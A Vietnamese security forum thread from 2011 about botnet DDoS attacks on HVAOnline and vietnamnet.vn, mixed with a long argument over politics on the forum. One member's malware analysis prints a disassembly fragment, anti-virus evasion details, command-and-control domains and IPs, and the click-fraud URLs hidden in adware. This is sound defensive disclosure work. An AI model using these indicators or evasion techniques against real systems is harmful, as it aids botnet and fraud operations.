cờ chính phủ Việt Nam, lẽ dĩ nhiên thông tin trong đó không do chính phủ VN viết.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

hihi Các Anh Chị vui lòng nhớ lại câu nói của Bác Trọng : "các cán bộ của chúng ta tuy có tâm nhưng chưa đủ tầm ...?" Các Anh Chị chiêm nghiệm kỹ: "lòng thì có nhưng dốt không làm đc nên ... hehehehehe chơi chữ, thử hỏi 85 tr dân VN có bao nhiêu % nghĩ thế ...???"

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc — GMT

Đừng bàn chính trị với tư tưởng ở đây nữa. CHẤM DỨT NGAY HÀNH VI CHÍNH TRỊ HOÁ CÔNG NGHỆ THÔNG TIN ĐI điều đó thật dơ bẩn và bỉ ổi, nhất là đối với những ai đang theo con đường công nghệ thông tin thì nên đi đúng con đường công nghệ thông tin thuần tuý, đừng biến nó thành công cụ phục vụ cho lợi ích của một cá nhân, tổ chức hay một nhóm tư tưởng gì đó, đừng làm cho 4 từ CÔNG NGHỆ THÔNG TIN trở nên u ám và đen tối bởi lợi ích của một tổ chức hay một nhóm người @TQN: I am waiting you

Phân tích tính chất vài trận DDoS HVA vừa qua.

ga_cum06 — GMT

Nội quy diễn đàn HVAOnline HVAOnline là diễn đàn phi lợi nhuận, phi tôn giáo, phi chính trị. Diễn đàn được lập ra với mục đích chia sẻ, trao đổi kiến thức và kinh nghiệm. Để HVAOnline là một nơi sinh hoạt lành mạnh và bổ ích, thành viên cần lưu ý những điểm như sau:................................

mỗi khi vào đăng nhập vào diễn đàn em đều thấy cái này, có vẻ như dạo này bác TQN hơi bận RCE , ít viết thêm các phân tích chuyên môn nên topic bắt đầu có vẻ lạc đề hay sao ý nhỉ ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cũng không bận lắm đâu, đang thất nghiệp mà. Nhưng thật ra giờ hết hứng thú với mấy anh stl nữa nên không muốn tham gia thêm. Em đang RCE mẫu "người tình cũ" của mấy anh stl gởi nhờ vào máy em năm ngoái. Lâu lâu móc ra phân tích một chút. Thấy có nhiều điều thú vị lắm ! Lắm lúc phân tích cái đống "mèo què" này, cứ tự hỏi, quái, thằng coder này khùng à, viết tầm bậy bạ à. Nhưng đọc kỹ, suy nghĩ kỹ thì không dám "khùng" đâu, thâm độc thiệt ! Vd mẫu DrWatson.dll em đang phân tích đây, Size = 19 KB (121,856 bytes), thấy nó có vẻ được code ra để đánh thẳng vào đối tượng là người dùng Laptop: Vista hay Win7, có install AVG. Vừa vào, trước khi lây nhiểm nó đã cắm đầu đi suspend (chứ không kill, các bạn để ý nhé) AVGIDSAgent.Exe, không cần biết là có AVGIDSAgent.exe hay không. Nó suspend bằng cách dùng các hàm Thread32First/Next... của ToolHlp32 API để suspend tất cả thread của process. Sau đó, nó lấy Windows version để xác định Windows user đang install có newer hơn WinXP không: Code:

text:10001431     @@CheckWinVer:                          ; CODE XREF: PrepareDebugSymbolW+304j
.text:10001431 1E8C        cmp     [ebp+dwVerMajor], 5
.text:10001438 1E8C        ja      short @@NewerThanWinXP
.text:10001438
.text:1000143A 1E8C        cmp     [ebp+dwVerMinor], 1
.text:10001441 1E8C        ja      short @@NewerThanWinXP
.text:10001441
.text:10001443 1E8C        mov     [ebp+bInjectToExplorer], 0
.text:1000144A 1E8C        jmp     short @@j_CanInjectToExplorer
.text:1000144A

Nếu là WinXP trở xuống thì nó sẽ thoát, không làm thêm gì cả ! Vì vậy, em rút kinh nghiệm từ giờ luôn, không bao giờ tiết lộ cho ai biết về máy tính, Win ver, AV, Firewall mà mình đang dùng, cả trên các forum hay bờ lốc, bờ liếc....

Phân tích tính chất vài trận DDoS HVA vừa qua.

cino — GMT

angel-pc wrote:

đối với những ai đang theo con đường công nghệ thông tin thì nên đi đúng con đường công nghệ thông tin thuần tuý, đừng biến nó thành công cụ phục vụ cho lợi ích của một cá nhân, tổ chức hay một nhóm tư tưởng gì đó, đừng làm cho 4 từ CÔNG NGHỆ THÔNG TIN trở nên u ám và đen tối bởi lợi ích của một tổ chức hay một nhóm người

Chào bác, em có nói tới vấn đề ngoài lề do tính chất của riêng cái topic này, theo lề lối của các bác admin và cũng để các bác đang RCE có hào hứng hơn vì công việc của họ có nhiều người quan tâm. :D Em là dân thường, nhưng cũng sợ bị "bạch hoá" lắm lắm. :D Đúng ra là em không post thêm nữa. Nhưng em cho rằng, quan điểm của chính cá nhân bác lại không đúng đắn cho lắm, đây cũng là quan điểm chung khi có nhiều bạn trẻ cứ hùi hụi vào "công nghệ, công nghệ thông tin" mà có những suy nghĩ "rạch ròi" tương tự như bác. (xin bác đừng vì câu nói này của em mà cãi cọ sang một vấn đề khác). Có nhiều người tâm hồn rất nhân văn nhưng vẫn là cha đẻ của những vũ khí kinh hoàng. Hải đăng Einstein là một ví dụ, vẫn có người trách Einstein là nguồn cơn của vấn đề bom nguyên tử, không chỉ vì cái thư ủng hộ dự án đó của cụ ấy, mà còn vì cái lý thuyết mở đường E=mc2 cho bom hạt nhân...

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

@all: vietnamnet.vn đã bị hack hay chỉ là 1 giao thức an toàn ... Post: 9:30 AM 17/Sep/2011.

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

TMDTHBC wrote:

@all: vietnamnet.vn đã bị hack hay chỉ là 1 giao thức an toàn ... Post: 9:30 AM 17/Sep/2011.

@TMDTHBC : anh hỏi " vietnamnet.vn đã bị hack hay chỉ là một giao thức an toàn ... " = em thật sự không hiểu anh hỏi gì ạ? xin anh lý giải câu hỏi cho em được học hỏi được không ạ? hay là kiểu " xìtrum ? " :-O >> thông tim thêm : bây giờ là 10h27 phút giờ hà nội em đang bên viên chăn dùng ISP của thailand nhưng vẫn không thể vào được www.vietnamnet.vn <<< lỗi bì bị ddos . The server at www.vietnamnet.vn is taking too long to respond.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

kutruoi wrote:

TMDTHBC wrote:

@all: vietnamnet.vn đã bị hack hay chỉ là 1 giao thức an toàn ... Post: 9:30 AM 17/Sep/2011.
@TMDTHBC : anh hỏi " vietnamnet.vn đã bị hack hay chỉ là một giao thức an toàn ... " = em thật sự không hiểu anh hỏi gì ạ? xin anh lý giải câu hỏi cho em được học hỏi được không ạ? hay là kiểu " xìtrum ? " :-O >> thông tim thêm : bây giờ là 10h27 phút giờ hà nội em đang bên viên chăn dùng ISP của thailand nhưng vẫn không thể vào được www.vietnamnet.vn <<< lỗi bì bị ddos . The server at www.vietnamnet.vn is taking too long to respond.

mình đang truy cập bằng cable SCTV, lúc tối còn "chạy" rất tốt, nhưng sáng ra truy cập lại thì chỉ hiện logo vietnamnet và thông báo: " Mời độc giả nhấn vào đây để tiếp tục". Nhưng nhấn vào thì "vẫn như cũ, không có tín hiệu gì hết ..."

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Tối nay thấy thời sự VTV1 đưa tin Vietnamnet.vn bị tấn công DDOS, nhưng nội dung rất chung chung, một loại virus lây lan trong cộng đồng :). Vietnamnet.vn mở rộng băng thông lên 30 lần mà vẫn chưa giải quyết được vấn đề. Tại sao VNN không nhờ HVA Admin nhỉ? Xấu hổ chăng? (cái này em đoàn mò, vì không biết nội bộ thế nào?)

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nguyen Bao — GMT

Mấy ngày nay truy cập VNN rất khó khăn, cá nhân mình nghĩ VNN thừa tiền để thuê người kiểm tra, kiện toàn bảo mật cho mình nhưng hông hiểu sao vẫn cứ nai lưng ra chịu đòn? Vì lí do nào đó liên quan đến chính trị không dám hó hé... Suy đi nghĩ lại thì chỉ có lí do đó là có khả năng thôi... Tức nhiên chỉ là phát biểu theo cảm tính.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lamletoi — GMT

kutruoi wrote:

TMDTHBC wrote:

>> thông tim thêm : bây giờ là 10h27 phút giờ hà nội em đang bên viên chăn dùng ISP của thailand nhưng vẫn không thể vào được www.vietnamnet.vn <<<
Bác này đi từ Lao qua Thailand mất chưa tới 1 phút ấy nhỉ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

love.exe — GMT

hì hì đọc mấy bài này tuy em không hiểu gì hết, nhưng thấy rất hay công nhận em phục mấy anh sát đất, không biết khi nào em được như mấy anh đây, giờ học ở trường chả biết được cái gì hết :-(

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc — GMT

@cino lời cuối, chỉ 2 ý thôi: 1. Sử dụng cntt phục vụ cho chính trị và chính trị hoá cntt là 2 cái khác nhau 2. MÌNH CẢM THẤY DƯỜNG NHƯ một số admin của HVA cụ thể là bác comale có ý muốn lợi dụng mức độ ảnh hưởng của diễn đàn để chầm chậm đưa những tư tưởng chính trị, quan điểm của bác vào đầu óc của các mem trong diễn đàn, như vậy là không fair play với các mem trong diễn đàn vốn là những người đam mê cntt, và nó giống như một chiến thuật chính trị hoá cntt ở đây, đọc nhiều bài viết của bác ấy mình như bội thực với những quan điểm của bác ấy, trong bất cứ tình huống nào có thể bác ấy đều đưa luận điểm mang tính chính trị vào. @comale: bàn về chính trị(chưa nói đến nội dung là gì) là quyền của mỗi cá nhân, mình không có ý kiến, nhưng bàn như thế nào, trong tình huống nào để nó được tế nhị và phù hợp tiêu chí và tính chất của diễn đàn mới là vấn đề Nếu mình hiểu sai ý bạn coi như mình chưa nói nhé cino

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman — GMT

@lamletoi : bạn đọc lại bạn kutruoi viết là " em đang ở viên chăn (lào) và sử dụng ISP ( nhà cung cấp dịch vụ internet của Thailand) .v.v. " điều này vẫn đúng mà . @angel-pc : bạn thật sự chưa hiểu vấn đề của anh conmale và theo tôi bạn chưa có khả năng để giải quyết vấn đề của chính bạn . > quan điểm sống của mỗi người là chuyện riêng. quan điểm chính trị của mỗi người là quan điểm riêng của mỗi người đối với thể chế chính trị của nơi nào đo mà họ quan tâm. > thể hiện quan điểm chính trị, thông qua việc bàn luận, tranh luận, nhóm họp, truyền bá, đưa tư tưởng vào cuộc sống = mọi phương tiện .v.v. là quyền của họ và cách của họ . ơ hơ. nếu bạn có tài năng thì cứ việc đi mà "gây ảnh hưởng" tư tưởng của bạn theo cách của bạn đi? thêm nữa thế nào là tiêu chí ? thế nào là phù hợp ? tiêu chí của diễn đàn này là của chủ nhân họ đề ra ! phù hợp hay không phù hợp là quyền của các anh ấy !!!! >> vì bạn chưa hiểu, hoặc chưa chịu đọc ngọn ngành vấn đề nên mới hồ đồ nói vậy. việc anh conmale đưa ra nhưng ý kiến, hoặc những quan điểm có liên quan một chút tới chính trị cũng bắt nguồn từ cái nguồn gốc sâu xa của vấn đề STL ? cái lý do tồn tại " The reason of existences of the why ? " ... > angel-pc hiểu kô ? .

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

angel-pc wrote:

Đừng bàn chính trị với tư tưởng ở đây nữa. CHẤM DỨT NGAY HÀNH VI CHÍNH TRỊ HOÁ CÔNG NGHỆ THÔNG TIN ĐI điều đó thật dơ bẩn và bỉ ổi, nhất là đối với những ai đang theo con đường công nghệ thông tin thì nên đi đúng con đường công nghệ thông tin thuần tuý, đừng biến nó thành công cụ phục vụ cho lợi ích của một cá nhân, tổ chức hay một nhóm tư tưởng gì đó, đừng làm cho 4 từ CÔNG NGHỆ THÔNG TIN trở nên u ám và đen tối bởi lợi ích của một tổ chức hay một nhóm người @TQN: I am waiting you

angel-pc wrote:

@cino lời cuối, chỉ 2 ý thôi: 1. Sử dụng cntt phục vụ cho chính trị và chính trị hoá cntt là 2 cái khác nhau 2. MÌNH CẢM THẤY DƯỜNG NHƯ một số admin của HVA cụ thể là bác comale có ý muốn lợi dụng mức độ ảnh hưởng của diễn đàn để chầm chậm đưa những tư tưởng chính trị, quan điểm của bác vào đầu óc của các mem trong diễn đàn, như vậy là không fair play với các mem trong diễn đàn vốn là những người đam mê cntt, và nó giống như một chiến thuật chính trị hoá cntt ở đây, đọc nhiều bài viết của bác ấy mình như bội thực với những quan điểm của bác ấy, trong bất cứ tình huống nào có thể bác ấy đều đưa luận điểm mang tính chính trị vào. @comale: bàn về chính trị(chưa nói đến nội dung là gì) là quyền của mỗi cá nhân, mình không có ý kiến, nhưng bàn như thế nào, trong tình huống nào để nó được tế nhị và phù hợp tiêu chí và tính chất của diễn đàn mới là vấn đề Nếu mình hiểu sai ý bạn coi như mình chưa nói nhé cino

Chính trị là 1 góc nhìn, ta không việc gì phải né tránh hay theo 1 cái lề tự tạo nào cả, những cái lề trong cuộc sống đã nhiều lắm rồi, các bạn đừng cố tạo thêm những cái lề trên thế giới mạng và yêu cầu những người có khả năng tư duy độc lập theo cái lề của các bạn, chán lắm. Những ai kéo chính trị vào mà bàn nhảm thì sẽ bộc lộ bản thân và ý đồ của họ, mọi người sẽ dần phớt lờ ý kiến hay phát biểu của các thành viên đó. Còn những bạn nào khuyên bảo người khác không đụng chạm gì đến chính trị khi bàn về các vấn đề trong CNTT thì có lẽ đã lạc hậu phần nào với thế giới rồi, nên tìm hiểu thêm về sâu Stuxnet và bình luận của giới nghiên cứu bảo mật và báo chí!

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

Các bác cho em hỏi chút được không ạ, ở đây có ai có thể giải thích cho em về vấn đề vietnamnet được ko ạ Hiện tại em check ở rất nhiều máy, có máy tình vào được, có máy tính lại không vào được, ko lẽ vietnamnet họ đang dùng phưong thức gì hay cách thức gì mà lại lọc được ra như vậy, có chỗ 5 máy tính thì 3 máy vào đựoc còn 2 thì chịu chết, nếu chặn ip thì em nghĩ ko đến nỗi như thế Lại có máy vào bằng IE và Firefox thì ko được nhưng chuyển sang dùng Google Chrome thì lại vào đựoc bình thường, như thế thì vietnamnet họ đang dùng cách thức gì để sàng lọc ra được như vậy, có ai biết cách này ko, giải thích cho anh em với ạ, em chưa thấy và chưa từng nghe thấy cách xử lý nào như vậy cả

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

angel-pc wrote:

@cino lời cuối, chỉ 2 ý thôi: 1. Sử dụng cntt phục vụ cho chính trị và chính trị hoá cntt là 2 cái khác nhau 2. MÌNH CẢM THẤY DƯỜNG NHƯ một số admin của HVA cụ thể là bác comale có ý muốn lợi dụng mức độ ảnh hưởng của diễn đàn để chầm chậm đưa những tư tưởng chính trị, quan điểm của bác vào đầu óc của các mem trong diễn đàn, như vậy là không fair play với các mem trong diễn đàn vốn là những người đam mê cntt, và nó giống như một chiến thuật chính trị hoá cntt ở đây, đọc nhiều bài viết của bác ấy mình như bội thực với những quan điểm của bác ấy, trong bất cứ tình huống nào có thể bác ấy đều đưa luận điểm mang tính chính trị vào. @comale: bàn về chính trị(chưa nói đến nội dung là gì) là quyền của mỗi cá nhân, mình không có ý kiến, nhưng bàn như thế nào, trong tình huống nào để nó được tế nhị và phù hợp tiêu chí và tính chất của diễn đàn mới là vấn đề Nếu mình hiểu sai ý bạn coi như mình chưa nói nhé cino

Bạn angel-pc trực tiếp lôi tên của tớ ra cho nên tớ cũng nên trả lời cho rốt ráo. Thứ nhất, cái "mình cảm thấy dường như" của bồ chỉ là cảm giác cá nhân mà nếu là cảm giác không có phân tích và chứng minh thì thường chẳng có mấy giá trị. Thứ nhì, diễn đàn này không phải tự nhiên mà có "mức độ ảnh hưởng" và "mức độ ảnh hưởng" của diễn đàn không chỉ mấy thứ kỹ thuật khô khan nhàm chán. Diễn đàn này từ lâu không phải là diễn đàn "hỏi" và "đáp" mà là diễn đàn đào sâu khả năng tư duy, lập luận và nhận định vấn đề. Từ hồi tớ tham gia diễn đàn này đến bây giờ, tớ hiếm khi trả lời kiểu "mì ăn liền" mà luôn luôn tìm cách khơi mở khả năng tư duy. Thành viên đến với diễn đàn này không chỉ là vì mớ kiến thức IT mà còn là những vấn đề xoay quanh IT. Bởi vậy, đừng có dùng cái mớ "đam mê CNTT" để là tiền đề và áp đặt nó vô chỗ "thuần tuý CNTT". Những gì cá nhân tớ mang lại và chia sẻ với diễn đàn này đều là những cái cần để suy ngẫm và bồi đắp và để làm một con người thật sự chớ không phải là những cỗ máy vô tri. Tớ đã nói rất nhiều lần: nếu con người chỉ "thuần tuý kỹ thuật" thì không còn là con người mà chỉ là những cỗ máy làm chuyện kỹ thuật. Con người còn có nhiều thứ khác hơn là mớ kỹ thuật khô khan và nhàm chán. Thứ ba, khi nói đến chuyện "fair play", bồ có thấy fair khi một diễn đàn kỹ thuật hoàn toàn tự nguyện và vô vụ lợi phải è lưng ra chống đỡ và gánh chịu những tổn thất vật chất, tinh thần, danh dự từ những kẻ đã sử dụng kỹ thuật để làm những trò chính trị hay không? Nếu bồ cho rằng họ có thể phát tán virus, tạo botnets, thâm nhập thông tin cá nhân để chơi những trò bêu rếu thất thiệt là "fair play" thì việc phân tích kỹ thuật những trò hư hoại ấy ở diễn đàn này (kèm theo những bình luận về phương diện lương tâm nghiệp vụ, về đạo đức con người") không "fair play" thì tiêu chuẩn "fair play" của bồ là loại tiêu chuẩn gì vậy? Thứ tư, tớ dám cá là bồ đọc chưa đến 1/100 những bài tớ viết hoặc bồ chỉ đọc một cách hời hợt với con mắt đầy định kiến để rồi có những "cảm giảc" như trên. Chính bồ là người luôn luôn bị bóng ma chính trị ám ảnh cho nên cái gì bồ cũng có thể dễ dàng quy chụp ở góc độ chính trị. Với tớ, cái gì hư hoại, dơ bẩn, vô đạo đức, kể cả đạo đức chức nghiệp và đạo đức làm con người, tớ đều có thể phê phán. Nói cho cùng, những cá nhân tham gia diễn đàn này là những cỗ máy kỹ thuật hay là những con người có cảm giác, có lương tri đây? Thứ năm, bồ có quyền không đăng nhập diễn đàn này, thậm chí không đọc những bài trên diễn đàn này của tớ. Chẳng ai ép buộc bồ phải đọc với mớ định kiến hẹp hòi và phiến diện của bồ để rồi cảm thấy bội thực cả. Chính bồ tự nguyện đọc rồi bồ tự nguyên than phiền là sao? Thứ sáu, tớ đã bảo, bản thân chính trị chẳng có tội lỗi gì hết. Chỉ có những cái đầu đầy định kiến và hạn hẹp mới nhìn đến chính trị như một thứ cấm kỵ một cách ấu trĩ. Trong khi bồ đang phát biểu như trên, chính bản thân bồ đã chìm đắm trong chính trị mà bồ cũng chẳng nhận thấy. Bồ hãy tự hỏi xem, ai đang có những hành vi "chính trị hoá công nghệ thông tin" vậy? Hãy tỉnh táo và trung thực khi suy nghĩ về việc này. Nếu bồ không đủ khả năng, xin đừng vào diễn đàn này nữa vì diễn đàn này không phù hợp với bồ. Hãy tìm một diễn đàn nào đó "thuần tuý CNTT" mà sinh hoạt và hãy cúi đầu như những cỗ máy không có tư duy, không khả năng nhận định, không cần phân tích.

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel-pc — GMT

Cảm ơn bác comale đã trả lời bác trả lời hay lắm mình sẽ từ từ suy ngẫm những gì bác nói

Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 — GMT

Mấy ngày hôm nay mình thấy vietnamnet bị DDoS khá nặng, mấy ngày liên tiếp hầu như không vô được. Không biết anh TQN có tiếp tục chiến đấu với bọn STL, diệt hết đám bot của tụi nó không?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Ngoài mẫu iTunesHelper.exe đã bị các AV diệt, tui nghĩ có thể vẫn còn có mẫu nào đó đang DDOS Vietnamnet mà chúng ta chưa biết. Vẫn tiếp tục nhờ các bạn dùng Wireshark, SmartSniff để monitor và up mẫu. Kết quả tracker.cmd của tui vừa tức thì: Code:

--2011-09-18 19:52:37--  http://wide.ircop.cn/index.txt?113
Resolving wide.ircop.cn... 200.74.244.197
Connecting to wide.ircop.cn|200.74.244.197|:80... failed: Connection refused.
--2011-09-18 19:52:38--  http://pref.firebay.cn/index.txt?113
Resolving pref.firebay.cn... 200.74.244.197
Connecting to pref.firebay.cn|200.74.244.197|:80... failed: Connection refused.
--2011-09-18 19:52:39--  http://daily.leteaks.com/index.txt?113
Resolving daily.leteaks.com... 200.74.244.197
Connecting to daily.leteaks.com|200.74.244.197|:80... failed: Connection refused.
--2011-09-18 19:52:40--  http://link.susaks.com/index.txt?113
Resolving link.susaks.com... 200.74.244.198
Connecting to link.susaks.com|200.74.244.198|:80... failed: Connection refused.
--2011-09-18 19:52:41--  http://option.drfound.net/k113.css
Resolving option.drfound.net... 204.12.220.181, 94.242.203.16
Connecting to option.drfound.net|204.12.220.181|:80... failed: Connection timed out.
Connecting to option.drfound.net|94.242.203.16|:80... failed: Connection timed out.
Retrying.

--2011-09-18 19:53:23--  (try: 2)  http://option.drfound.net/k113.css
Connecting to option.drfound.net|204.12.220.181|:80... failed: Connection timed out.
Connecting to option.drfound.net|94.242.203.16|:80... failed: Connection timed out.
Retrying.

--2011-09-18 19:54:05--  (try: 3)  http://option.drfound.net/k113.css
Connecting to option.drfound.net|204.12.220.181|:80... failed: Connection timed out.
Connecting to option.drfound.net|94.242.203.16|:80... failed: Connection timed out.
Giving up.

Vào http://pref.firebay.cn và http://pref.firebay.cn thì lại thấy là website của công ty Hanover Company Store, LLC, hình như bán vải, gối, mền. Quái, mấy anh stl chuyển nghề qua buôn bán à :-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

@conmale: cảm phục anh, tư tưởng và hành động rất phân minh, rất hàn lâm. Mình thích bài bình luận của anh. Đánh tan những suy nghĩ vẩn vơ, tơ tưởng, ... rất hay - phân tích rất hay. @TQN: mình cần làm gì để giúp, a vui lòng pm riêng nhé. (lúc này đang rảnh, online 12/24 nên có cơ hội đóng góp cho forum mạnh hơn) Nhưng mình đang sử dụng laptop + win7 ultimate, firewall and ms microsoft essential update liên tục nên .... ---> "TQN" a cứ đưa hướng dẫn làm gì nhé. god bless u.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Vào http://pref.firebay.cn và http://pref.firebay.cn thì lại thấy là website của công ty Hanover Company Store, LLC, hình như bán vải, gối, mền. Quái, mấy anh stl chuyển nghề qua buôn bán à

Chắc nhờ bán chăn ga gối đệm STL mới có kinh phí duy trì hoặc có thể là lấy credit card của khách hàng duy trì hoạt động. Em thấy chẳng 1 công ty kinh doanh đàng hoàng nào mà Domain lại để Status: clientTransferProhibited cả

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Hiện tượng stl sử dụng các domain .cn không có gì lạ. Trước đây, stl đã từng thâm nhập các trang web có domain không phải do họ làm chủ để host thông tin "bạch hoá" và phát tán malware rồi. Những cố gắng sử dụng (càng nhiều càng tốt) thông tin có liên quan đến TQ là những cố gắng thô thiển bởi vì nếu TQ muốn chơi thì không việc gì lại sơ hở đến mức phải sử dụng thông tin liên quan đến TQ. Hơn nữa, hàng loạt domains mà stl đã đăng ký và sử dụng trong suốt thời gian qua, đa số là sử dụng các domain registrars thông thường. Nếu đã cố tình giấu danh tính và nguồn gốc từ trước đến giờ thì việc gì bây giờ lại "xì" ra một số thông tin có liên quan đến TQ? Riêng vietnamnet thì tớ không thể vào trang web này gần cả tháng nay rồi. Ngay cả tớ tunnel qua một IP ở VN cũng không vào vietnamnet được. Các IP nước ngoài như Nhật, Úc, Đức, Mỹ ...v....v... đều không vào vietnamnet được. Có tạo cookie (như ai đó có đề cập) cũng vô phương. Theo vài nguồn (chưa kiểm chứng) thì vietnamnet đã tường trình sự vụ đến CA và nhờ được giúp đỡ :P . Hãy chờ xem kết quả ra sao.

Phân tích tính chất vài trận DDoS HVA vừa qua.

levanduyet — GMT

conmale wrote:

Riêng vietnamnet thì tớ không thể vào trang web này gần cả tháng nay rồi. Ngay cả tớ tunnel qua một IP ở VN cũng không vào vietnamnet được. Các IP nước ngoài như Nhật, Úc, Đức, Mỹ ...v....v... đều không vào vietnamnet được. Có tạo cookie (như ai đó có đề cập) cũng vô phương. Theo vài nguồn (chưa kiểm chứng) thì vietnamnet đã tường trình sự vụ đến CA và nhờ được giúp đỡ :P . Hãy chờ xem kết quả ra sao.

Tôi thì vẫn vào bình thường nhưng cũng có đôi lúc bị time out. Chứng tỏ kỹ thuật bên Vietnamnet đã thiết lập gì đó mà anh không vào được. Cách đây 2 hôm, xem TV, có thấy thông báo về việc Vietnamnet bị DDOS, chắc bên Vietnamnet cũng không chịu được vì bị thất thu các nguồn quảng cáo (thông tin này xem trên TV) nên phải nhờ bên CA thôi. LVD

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Sự gian dối, lừa đão, bằng mọi cách đạp đầu người khác để đi lên càng ngày càng phổ biến và lộ rõ. Sáng nay, duyệt facebook, thấy cái link phần mềm ToiTietKiem.Vn_Professional bị nghi ngờ có trojan, tui down về phân tích thử. Quả đúng không sai: một phần mềm rất tệ, trái ngược hẳn với quảng cáo rầm rộ, của nhóm sv của FPT, đã đoạt giải gì đó, lại cài cắm click adware trong đó. Đây chỉ là một đoạn link click của linkbucks.com mà ct này nhúng vào, dùng Form3 với 4 component WebBrowser để tự động gọi method Click. Form3 được tác giả hide đi nên chúng ta sẽ không thấy trên màn hình: Code:

http://a74b24df.linkbucks.com
 http://a74b24df.linkbucks.com
 http://a74b24df.linkbucks.com
 http://2050aad9.linkbucks.com
 http://d27332b6.linkbucks.com
 http://052162c8.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://7d67a321.linkbucks.com
 http://3060e20c.linkbucks.com
 http://ac9ee037.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://4d6e46fd.linkbucks.com
 http://4a6045bc.linkbucks.com
 http://f00ee973.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://b9e8ccfb.linkbucks.com
 http://0779dfd9.linkbucks.com
 http://82883b02.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://a14a1ab3.linkbucks.com
 http://6590b68a.linkbucks.com
 http://c603c304.linkbucks.com
 http://d332db80.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://44ce52c8.linkbucks.com
 http://5fffee9b.linkbucks.com
 http://bfbf5fab.linkbucks.com
 http://438e215b.linkbucks.com
 http://1ec41b10.linkbucks.com
 http://49abc570.linkbucks.com
 http://49abc570.linkbucks.com
 http://49abc570.linkbucks.com
 http://54a960f9.linkbucks.com
 http://d3125c51.linkbucks.com
 http://aa3cee9a.linkbucks.com
 http://40df7943.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://a47ff0db.linkbucks.com
 http://6fcc3f8e.linkbucks.com
 http://141e8889.linkbucks.com
 http://8464fce6.linkbucks.com

Download phần mềm này tại: http://www.toitietkiem.vn/sites/default/files/ToiTietKiem.Vn%20Professional%20Setup.rar Chỉ biết bó 3 chân.com. Càng lúc càng loạn ! Không biết FPT và Toyota có biết là phần mềm và nhóm sv này đã làm điều bậy bạ này không, có đáng để họ khen thưởng, tung hô không ? PS: Không không chắc sẽ có nhiều người ghét mình, coi mình là kẽ "chọc gậy bánh xe" quá :-(

Phân tích tính chất vài trận DDoS HVA vừa qua.

leafclover — GMT

conmale wrote:

Theo vài nguồn (chưa kiểm chứng) thì vietnamnet đã tường trình sự vụ đến CA và nhờ được giúp đỡ :P . Hãy chờ xem kết quả ra sao.

Vụ việc VietnamNet đã được đưa lên chương trình thời sự của VTV1 rồi http://media.vtv.vn/Media/Get/Thoi-su-19h---17092011-4ab5977e2f.html Bắt đầu từ phút thứ 24. Hy vọng sau đây các cơ quan chức năng sẽ có các động thái tích cực hơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tôi nghi ngờ vẫn còn mẫu nào khác, trong hay ngoài nước, đang âm thâm DDOS Vietnamnet. Mong bà con chung tay tìm và tiêu diệt mạng botnet này. PS: Tôi biết Vietnamnet từ lâu rồi, chắc khoãng năm 1999, lúc đó forum đầu tiên về IT mà tui tham gia chính là forum của VNN. Lúc đó tôi làm mod box lập trình C/C++/Delphi... Nhanh thật, hơn 10 năm đã qua rồi. Giờ tham gia đóng góp 1 chút công sức nhỏ cho VNN cũng đáng !

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

TQN wrote:

Sự gian dối, lừa đão, bằng mọi cách đạp đầu người khác để đi lên càng ngày càng phổ biến và lộ rõ. Sáng nay, duyệt facebook, thấy cái link phần mềm ToiTietKiem.Vn_Professional bị nghi ngờ có trojan, tui down về phân tích thử. Quả đúng không sai: một phần mềm rất tệ, trái ngược hẳn với quảng cáo rầm rộ, của nhóm sv của FPT, đã đoạt giải gì đó, lại cài cắm click adware trong đó. Đây chỉ là một đoạn link click của linkbucks.com mà ct này nhúng vào, dùng Form3 với 4 component WebBrowser để tự động gọi method Click. Form3 được tác giả hide đi nên chúng ta sẽ không thấy trên màn hình: Code:
http://a74b24df.linkbucks.com
 http://a74b24df.linkbucks.com
 http://a74b24df.linkbucks.com
 http://2050aad9.linkbucks.com
 http://d27332b6.linkbucks.com
 http://052162c8.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://7d67a321.linkbucks.com
 http://3060e20c.linkbucks.com
 http://ac9ee037.linkbucks.com
 http://b2749ffc.linkbucks.com
 http://4d6e46fd.linkbucks.com
 http://4a6045bc.linkbucks.com
 http://f00ee973.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://b9e8ccfb.linkbucks.com
 http://0779dfd9.linkbucks.com
 http://82883b02.linkbucks.com
 http://98a63f1d.linkbucks.com
 http://a14a1ab3.linkbucks.com
 http://6590b68a.linkbucks.com
 http://c603c304.linkbucks.com
 http://d332db80.linkbucks.com
 http://44ce52c8.linkbucks.com
